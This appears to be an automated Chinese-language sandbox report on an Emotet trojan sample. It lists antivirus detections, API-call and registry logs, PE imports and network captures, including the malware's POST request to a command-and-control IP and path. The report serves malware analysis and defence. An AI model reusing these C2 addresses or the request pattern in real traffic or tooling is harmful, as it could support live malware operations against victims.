7.0
高危
54 个模型检测该样本为恶意!
重新分析
更多

89d1bb8e69be422ff42ad9a8d05326da700590d564a659bd0ac6861c3c6f5361

dd1ea1b3e5eb110e1214be66f8249411.exe

分析耗时

76s

最近分析

文件大小

156.0KB
静态报毒 动态报毒 AI SCORE=87 AIDETECTVM BANKERX BGTW BSCOPE CKGENERIC CLASSIC ELDORADO EMOTET GENCIRC GENERICKDZ GENKRYPTIK HFKT HIGH CONFIDENCE HQUVIY JY0@AGC6TJMI KRYPTIK MALWARE1 QFRZM QVM07 R + TROJ R002C0DH820 R347470 SCORE SUSGEN TRST UNCLASSIFIEDMALWARE@0 UNSAFE ZEXAE 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/Emotet.9435fd82 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Kingsoft 20200905 2013.8.14.323
McAfee Emotet-FRT!DD1EA1B3E5EB 20200904 6.0.6.653
Tencent Malware.Win32.Gencirc.10cde668 20200905 1.0.0.1
CrowdStrike 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619948432.643241
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (4 个事件)
Time & API Arguments Status Return Repeated
1619948417.018241
CryptGenKey
crypto_handle: 0x0084b078
algorithm_identifier: 0x0000660e ()
provider_handle: 0x0084a918
flags: 1
key: f&fcr5TðzÙÇÀÕË
success 1 0
1619948432.659241
CryptExportKey
crypto_handle: 0x0084b078
crypto_export_handle: 0x0084a9e0
buffer: f¤òø¯ ¶oNÆc_ÃPúÅü79VØÑd0“Ý“¨ŽÆ»Ýc,Ñ£—Ï÷I®‹Ü3Ø@ ~Y²s<¼ÍÙ¦îýSç!ø§â¤5î¼B¼&…n®õ=ýyb&eÝôV-¸
blob_type: 1
flags: 64
success 1 0
1619948438.674241
CryptExportKey
crypto_handle: 0x0084b078
crypto_export_handle: 0x0084a9e0
buffer: f¤â¬˜µZiÿ³È€ÒUè1ˆñ _"¶h4h(Þ¬®ïñêϘ„X•i“ øÏ !°Ö+•PŒ‹A2»î—³®Åý¦uPî)vÛAùtü“I¶[Vï!-˜-¬k“¿
blob_type: 1
flags: 64
success 1 0
1619948470.284241
CryptExportKey
crypto_handle: 0x0084b078
crypto_export_handle: 0x0084a9e0
buffer: f¤¢—ž`Ž”îùØß ³0瞈;ï>šà%Í¨ëð’jbêp—¬J‡$ˆ®lJËB¸áÈÙ¸¹*ŸÞ Ë@¨&¥Û·Ä±fÉóÊߚ’T Åó»OÍ«"ԃx
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 个事件)
packer Armadillo v1.71
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features Connection to IP address suspicious_request POST http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
Performs some HTTP requests (1 个事件)
request POST http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
Sends data using the HTTP POST Method (1 个事件)
request POST http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
Allocates read-write-execute memory (usually to unpack itself) (1 个事件)
Time & API Arguments Status Return Repeated
1619948416.534241
NtAllocateVirtualMemory
process_identifier: 368
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x021b0000
success 0 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619948433.112241
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process dd1ea1b3e5eb110e1214be66f8249411.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619948432.784241
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (4 个事件)
host 172.217.24.14
host 200.55.243.138
host 212.51.142.238
host 47.146.32.175
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1619948435.674241
RegSetValueExA
key_handle: 0x0000039c
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619948435.674241
RegSetValueExA
key_handle: 0x0000039c
value: ÀÙ¿<=?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619948435.674241
RegSetValueExA
key_handle: 0x0000039c
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619948435.674241
RegSetValueExW
key_handle: 0x0000039c
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619948435.690241
RegSetValueExA
key_handle: 0x000003b4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619948435.690241
RegSetValueExA
key_handle: 0x000003b4
value: ÀÙ¿<=?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619948435.690241
RegSetValueExA
key_handle: 0x000003b4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619948435.706241
RegSetValueExW
key_handle: 0x00000398
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619948436.128241
RegSetValueExA
key_handle: 0x000003c0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619948436.128241
RegSetValueExA
key_handle: 0x000003c0
value: ù==?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619948436.128241
RegSetValueExA
key_handle: 0x000003c0
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619948436.128241
RegSetValueExW
key_handle: 0x000003c0
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619948436.143241
RegSetValueExA
key_handle: 0x000003c4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619948436.143241
RegSetValueExA
key_handle: 0x000003c4
value: ù==?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619948436.143241
RegSetValueExA
key_handle: 0x000003c4
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 个事件)
dead_host 212.51.142.238:8080
File has been identified by 54 AntiVirus engines on VirusTotal as malicious (50 out of 54 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.69294
FireEye Trojan.GenericKDZ.69294
CAT-QuickHeal Trojan.CKGENERIC
ALYac Trojan.GenericKDZ.69294
Cylance Unsafe
Zillya Backdoor.Emotet.Win32.905
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/Emotet.9435fd82
K7GW Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D10EAE
Invincea Mal/Generic-R + Troj/Emotet-CKR
BitDefenderTheta Gen:NN.ZexaE.34216.jy0@aGc6tJmi
Cyren W32/Emotet.APA.gen!Eldorado
Symantec Trojan.Emotet
APEX Malicious
ClamAV Win.Packed.Emotet-9623870-0
Kaspersky Backdoor.Win32.Emotet.bgtw
BitDefender Trojan.GenericKDZ.69294
NANO-Antivirus Trojan.Win32.Emotet.hquviy
ViRobot Trojan.Win32.Z.Emotet.159744.LI
Rising Trojan.Kryptik!1.CA51 (CLASSIC)
Ad-Aware Trojan.GenericKDZ.69294
TACHYON Backdoor/W32.Emotet.159744
Comodo .UnclassifiedMalware@0
F-Secure Trojan.TR/Crypt.Agent.qfrzm
DrWeb Trojan.Emotet.999
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R002C0DH820
Sophos Troj/Emotet-CKR
Ikarus Trojan-Banker.Emotet
Jiangmin Backdoor.Emotet.pw
MaxSecure Trojan.Malware.104539068.susgen
Avira TR/Crypt.Agent.qfrzm
Antiy-AVL Trojan/Win32.Generic
Microsoft Trojan:Win32/Emotet.GM!MTB
AegisLab Trojan.Win32.Emotet.trsT
ZoneAlarm Backdoor.Win32.Emotet.bgtw
GData Trojan.GenericKDZ.69294
Cynet Malicious (score: 85)
AhnLab-V3 Trojan/Win32.GenKryptik.R347470
McAfee Emotet-FRT!DD1EA1B3E5EB
MAX malware (ai score=87)
VBA32 BScope.Backdoor.Emotet
Malwarebytes Trojan.MalPack.TRE
ESET-NOD32 a variant of Win32/Kryptik.HFKT
TrendMicro-HouseCall TROJ_GEN.R002C0DH820
Tencent Malware.Win32.Gencirc.10cde668
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-08-07 04:50:00

Imports

Library SHLWAPI.dll:
0x417e24 PathFindExtensionA
0x417e28 PathFileExistsA
Library MFC42.DLL:
0x4178ec
0x4178f0
0x4178f4
0x4178f8
0x4178fc
0x417900
0x417904
0x417908
0x41790c
0x417910
0x417914
0x417918
0x41791c
0x417920
0x417924
0x417928
0x41792c
0x417930
0x417934
0x417938
0x41793c
0x417940
0x417944
0x417948
0x41794c
0x417950
0x417954
0x417958
0x41795c
0x417960
0x417964
0x417968
0x41796c
0x417970
0x417974
0x417978
0x41797c
0x417980
0x417984
0x417988
0x41798c
0x417990
0x417994
0x417998
0x41799c
0x4179a0
0x4179a4
0x4179a8
0x4179ac
0x4179b0
0x4179b4
0x4179b8
0x4179bc
0x4179c0
0x4179c4
0x4179c8
0x4179cc
0x4179d0
0x4179d4
0x4179d8
0x4179dc
0x4179e0
0x4179e4
0x4179e8
0x4179ec
0x4179f0
0x4179f4
0x4179f8
0x4179fc
0x417a00
0x417a04
0x417a08
0x417a0c
0x417a10
0x417a14
0x417a18
0x417a1c
0x417a20
0x417a24
0x417a28
0x417a2c
0x417a30
0x417a34
0x417a38
0x417a3c
0x417a40
0x417a44
0x417a48
0x417a4c
0x417a50
0x417a54
0x417a58
0x417a5c
0x417a60
0x417a64
0x417a68
0x417a6c
0x417a70
0x417a74
0x417a78
0x417a7c
0x417a80
0x417a84
0x417a88
0x417a8c
0x417a90
0x417a94
0x417a98
0x417a9c
0x417aa0
0x417aa4
0x417aa8
0x417aac
0x417ab0
0x417ab4
0x417ab8
0x417abc
0x417ac0
0x417ac4
0x417ac8
0x417acc
0x417ad0
0x417ad4
0x417ad8
0x417adc
0x417ae0
0x417ae4
0x417ae8
0x417aec
0x417af0
0x417af4
0x417af8
0x417afc
0x417b00
0x417b04
0x417b08
0x417b0c
0x417b10
0x417b14
0x417b18
0x417b1c
0x417b20
0x417b24
0x417b28
0x417b2c
0x417b30
0x417b34
0x417b38
0x417b3c
0x417b40
0x417b44
0x417b48
0x417b4c
0x417b50
0x417b54
0x417b58
0x417b5c
0x417b60
0x417b64
0x417b68
0x417b6c
0x417b70
0x417b74
0x417b78
0x417b7c
0x417b80
0x417b84
0x417b88
0x417b8c
0x417b90
0x417b94
0x417b98
0x417b9c
0x417ba0
0x417ba4
0x417ba8
0x417bac
0x417bb0
0x417bb4
0x417bb8
0x417bbc
0x417bc0
0x417bc4
0x417bc8
0x417bcc
0x417bd0
0x417bd4
0x417bd8
0x417bdc
0x417be0
0x417be4
0x417be8
0x417bec
0x417bf0
0x417bf4
0x417bf8
Library MSVCRT.dll:
0x417d00 _initterm
0x417d04 __setusermatherr
0x417d08 _adjust_fdiv
0x417d0c __p__commode
0x417d10 __p__fmode
0x417d14 __set_app_type
0x417d18 _controlfp
0x417d1c ?terminate@@YAXXZ
0x417d20 _except_handler3
0x417d24 _onexit
0x417d28 __dllonexit
0x417d2c time
0x417d30 __getmainargs
0x417d34 memset
0x417d38 atoi
0x417d3c _wcslwr
0x417d40 calloc
0x417d44 malloc
0x417d48 free
0x417d4c memcpy
0x417d50 sprintf
0x417d54 isprint
0x417d58 _stat
0x417d5c _mbsicmp
0x417d60 _mbscmp
0x417d64 fseek
0x417d68 _setmbcp
0x417d6c _acmdln
0x417d70 exit
0x417d74 _XcptFilter
0x417d78 strlen
0x417d7c _exit
0x417d80 _ftol
0x417d84 ceil
0x417d88 fopen
0x417d8c fwrite
0x417d90 fclose
0x417d94 __CxxFrameHandler
0x417d98 _EH_prolog
0x417d9c strtol
0x417da0 ftell
Library KERNEL32.dll:
0x41786c LoadLibraryA
0x417870 LoadLibraryExW
0x417874 LoadLibraryExA
0x417878 GetProcAddress
0x41787c WaitForSingleObject
0x417880 ResetEvent
0x417884 GetModuleHandleA
0x417888 GetStartupInfoA
0x41788c CreateEventA
0x417890 GetLastError
0x417894 FreeLibrary
0x417898 GlobalSize
0x41789c GlobalAlloc
0x4178a0 GlobalLock
0x4178a4 GlobalUnlock
0x4178a8 CloseHandle
0x4178ac CreateDirectoryA
0x4178b0 lstrlenA
Library USER32.dll:
0x417e58 EnableScrollBar
0x417e5c SetScrollInfo
0x417e60 ReleaseCapture
0x417e64 GetKeyState
0x417e6c EnableMenuItem
0x417e70 GetSubMenu
0x417e74 EmptyClipboard
0x417e78 InvalidateRect
0x417e7c CreateWindowExA
0x417e80 InSendMessage
0x417e84 MessageBoxA
0x417e88 PtInRect
0x417e8c CreateCaret
0x417e90 DragDetect
0x417e94 SetCapture
0x417e98 RedrawWindow
0x417e9c SetScrollPos
0x417ea0 DestroyCaret
0x417ea4 ShowCaret
0x417ea8 FillRect
0x417eac DrawTextA
0x417eb0 GetSysColor
0x417eb4 EnableWindow
0x417eb8 LoadMenuA
0x417ebc IsIconic
0x417ec0 LoadIconA
0x417ec4 GetSystemMetrics
0x417ec8 GetClientRect
0x417ecc SendMessageA
0x417ed0 DrawIcon
0x417ed4 SetMenu
0x417ed8 SetCaretPos
Library GDI32.dll:
0x417814 CreateCompatibleDC
0x417818 CreateSolidBrush
0x41781c SetBoundsRect
0x417820 GetCharWidthA
0x417828 TextOutA
0x41782c BitBlt
0x417830 CreateFontA
0x417834 SelectObject
Library SHELL32.dll:
0x417df0 DragQueryFileA
0x417df4 DragFinish
Library ole32.dll:
0x417f20 OleUninitialize
0x417f24 OleInitialize
0x417f28 CoCreateInstance
Library MSVCP60.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49174 47.146.32.175 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/ 
POST /aQAfdIbhxEW/n2MfLIDptJt3/ HTTP/1.1
Referer: http://47.146.32.175/aQAfdIbhxEW/n2MfLIDptJt3/
Content-Type: multipart/form-data; boundary=---------------------------798350694272319
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 47.146.32.175
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.